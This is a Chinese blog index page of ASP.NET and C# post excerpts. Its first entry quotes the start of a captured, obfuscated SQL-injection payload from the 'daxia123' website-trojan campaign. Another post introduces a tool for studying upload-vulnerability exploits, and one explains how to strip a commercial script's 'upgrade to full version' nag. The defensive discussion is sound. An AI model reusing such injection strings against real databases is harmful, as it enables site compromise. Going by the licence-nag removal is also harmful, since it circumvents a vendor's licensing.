原创 daxia123 網站木馬近期橫掃國內網站【站長都來】

注入攻擊攔截的源碼:  dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152

原创 asp.net 2.0 讀寫配置文件

.net1.1中如果需要靈活的操作和讀寫配置文件並不是十分方便,一般都會在項目中封裝一個配置文件管理類來進行讀寫操作。而在.net2.0中使用ConfigurationManager 和WebConfigurationManager 類可

原创 IHttpHandler中捕獲Session

     頭上的烏雲終於散去了,看來真是不能閉門造車啊,經朋友的提醒,我心中太陽也出來了,這幾天做的對特定請求進行響應的接口,只是在內部處理,不存在U

原创 獲取本機MAC和獲取客戶端MAC

        /// <summary>         /// 獲取客戶端MAC         /// </summary>         /// <param name="dest"></param>         

原创 WSockExpert0.6 beta 1工具介紹和使用實例

    喜歡腳本入侵技術的朋友,一定聽說過鬧得紛紛揚揚的上傳漏洞吧!有許多利用上傳漏洞的工具,比如桂林老兵的“動網上傳漏洞利用工具”、“天意上傳漏洞工具”等,但是大家在使用這些工具的時候有沒有想過它的入侵原理呢?它的背後工作方式是怎麼樣的

原创 深入“daxia123 網站木馬” 來自微軟專家的SQL注入防範方法

自去年下半年開始,很多網站被惡意代碼說困擾,攻擊者在動態網頁的SQL數據庫中注入惡意的HTML < SCRIPT>標籤。這種腳本攻擊行爲在2008年第一季度開始加速傳播,並繼續影響有漏洞的Web應用。 這些Web應用存在以下幾點共性: 使

原创 C#三種模擬自動登錄和提交POST信息的實現方法

網頁自動登錄(提交Post內容)的用途很多,如驗證身份、程序升級、網絡投票等,以下是用C#實現的方法。       網頁自動登錄和提交POST信息的核心就是分析網頁的源代碼(HTML),在C#中,可以用來提取網頁HTML的組件比較多,常

原创 ASP.NET 2.0 PostBack請求後保持頁面滾動條的位置

    今天錄入數據的同事給我提了個需求,說拉下來的滾動條,點擊完複選框能不能保守它的位置;     於是我g.cn了一下,果然有好心人幫我解決了這個問題,方法如下:    只需要在aspx頁面的頂端<%Page%>部分中加入Mainta

原创 sql server 批量修改表和存儲過程的所有者——提高SQL安全性

 在“深入《daxia123 網站木馬” 來自微軟專家的SQL注入防範方法》文章裏,我深入瞭解了自微軟專家的SQL注入防範方法,爲了確保使用數據庫的Web應用程序最少訪問權限。我可以批量修改表和存儲過程的所有者,然後通過控制所有者的權限來

原创 創建可在網頁下載安裝的ActiveX控件(通過Setup.exe安裝)

 爲完成網頁自動下載並安裝控件的功能,需要通過C#創建一個ActiveX控件,然後將該控件置於安裝程序中,在打開網頁的時候下載、安裝並註冊該ActiveX控件。本文是採用VS2005創建的,VS2003創建過程與之相似。     首先,創

原创 在ASP.NET 2.0中開發通配符映射應用程序的一些問題

文章的題目想了好幾個,比如:“在ASP.NET 2.0中開發通配符映射應用程序的一些問題”,後來考慮到爲了吸引眼球:),併爲了好記,選了這個有點俗的題

原创 清楚Magic Thumb的“Please upgrade to full version of Magic Thumb™”

Magic Thumb™的效果不錯,不過頁面加載後,可能是由於js裏過於複雜的算法,因此有點慢,好了,說一下如果去掉Please upgrade to full version of Magic Thumb™ 吧,看下面的代碼吧 /* C

原创 40個輕量級 JavaScript 庫

流行的 JavaScript 庫不勝枚舉,jQuery, MooTools, Prototype, Dojo, YUI。這些 JavaScript 庫功能豐富,加上它們的插件,幾乎能勝任任何工作,然而這是有代價的,這些庫往往導致你的網頁尺

原创 遼寧省省直個人住房公積金貸款指南

  最近家裏買房子,我的住房公積金又是省的,又趕上是遼寧省的公積金,該公積金中心真是夠神祕的了,不知道是服務於誰的,就連一個官方網站的沒有,別說透明瞭,找個查詢電話都夠費勁的了,真是讓我夠鬱悶的了,爲了讓大家少走點彎路,我把一些信息也共

原创 ASP.NET 的狀態管理

  web Form 網頁是基於HTTP的,它們沒有狀態, 這意味着它們不知道所有的請求是否來自同一臺客戶端計算機,網頁是受到了破壞,以及是否得到了刷新,這樣就可能造成信息的丟失。 於是, 狀態管理就成了開發網絡應用程序的一個實實在在的問